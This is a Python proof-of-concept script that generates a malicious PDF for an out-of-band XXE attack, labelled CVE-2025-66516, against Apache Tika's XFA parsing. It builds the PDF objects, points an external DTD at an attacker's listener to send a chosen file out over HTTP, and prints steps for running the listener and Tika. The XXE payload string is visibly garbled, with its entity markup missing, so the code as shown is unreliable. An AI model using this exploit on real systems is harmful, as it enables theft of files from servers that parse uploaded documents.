#!/usr/bin/env python3 """ CVE-2025-66516 OOB XXE POC Generator Out-of-band data exfiltration via HTTP DISCLAIMER: This POC code is for educational purposes only. Unauthorized use may violate laws. """ def build_oob_xfa_xml(listener_ip, listener_port, target_file): """Creates XFA with HTTP-based XXE for out-of-band data exfiltration""" # Build URL for external DTD hosted on attacker's server dtd_url = f"http://{listener_ip}:{listener_port}/evil.dtd" # Return XFA XML with Out-of-Band XXE payload return f""" %dtd; ]> &send; """ def build_pdf(xfa_xml, out_path): # List to accumulate PDF binary parts parts = [] # PDF header with version 1.7 and binary marker bytes parts.append(b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n") # Track byte offsets of each PDF object for xref table xref_positions = [] # Calculate current byte offset in PDF def offset(): return sum(len(p) for p in parts) # Add a PDF object with given number and body content def add_obj(num, body): # Record starting position of this object xref_positions.append(offset()) # Object header: "n 0 obj" parts.append(f"{num} 0 obj\n".encode("ascii")) # Object body (dictionary, stream, etc.) parts.append(body) # Object footer parts.append(b"\nendobj\n") # Object 1: Document Catalog - root of PDF, references Pages and AcroForm add_obj(1, b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>") # Object 2: Pages tree with one page add_obj(2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>") # Object 3: Single page with letter size (612x792 points = 8.5x11 inches) add_obj(3, b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << >> >>") # Encode XFA XML to UTF-8 bytes x_bytes = xfa_xml.encode("utf-8") # Create stream object with length dictionary and stream data x_stream = f"<< /Length {len(x_bytes)} >>\nstream\n".encode("ascii") + x_bytes + b"\nendstream" # Object 5: XFA stream containing Out-of-Band XXE payload add_obj(5, x_stream) # Object 4: AcroForm dictionary with /XFA reference pointing to object 5 add_obj(4, b"<< /NeedAppearances true /Fields [] /XFA 5 0 R >>") # Record start position of cross-reference table xref_start = offset() # Begin xref table parts.append(b"xref\n") # Total number of objects (excluding object 0) total = 5 # Xref subsection header: starts at 0, includes total+1 entries parts.append(f"0 {total+1}\n".encode("ascii")) # Entry 0: free object entry (always "0000000000 65535 f") parts.append(b"0000000000 65535 f \n") # Write xref entries for each object with 10-digit byte offset for pos in xref_positions: parts.append(f"{pos:010d} 00000 n \n".encode("ascii")) # Trailer dictionary with document size and root reference, plus startxref pointer parts.append( f"trailer\n<< /Size {total+1} /Root 1 0 R >>\nstartxref\n{xref_start}\n%%EOF\n".encode("ascii") ) with open(out_path, "wb") as f: f.write(b"".join(parts)) if __name__ == "__main__": import sys listener_ip = "127.0.0.1" listener_port = 8888 target_file = "/home/siddhartha/apache_tika_poc/fake-secrets.txt" if len(sys.argv) > 1: listener_ip = sys.argv[1] if len(sys.argv) > 2: listener_port = int(sys.argv[2]) if len(sys.argv) > 3: target_file = sys.argv[3] xfa_xml = build_oob_xfa_xml(listener_ip, listener_port, target_file) build_pdf(xfa_xml, "cve-2025-66516_OOB_XXE.pdf") print(f"[+] Generated cve-2025-66516_OOB_XXE.pdf") print(f"[+] HTTP listener target: http://{listener_ip}:{listener_port}/") print(f"[+] Target file to exfiltrate: {target_file}") print(f"[+] Start listener: python3 http_listener.py {listener_port}") print(f"[+] Test: java -jar tika-app-3.2.1.jar -t cve-2025-66516_OOB_XXE.pdf")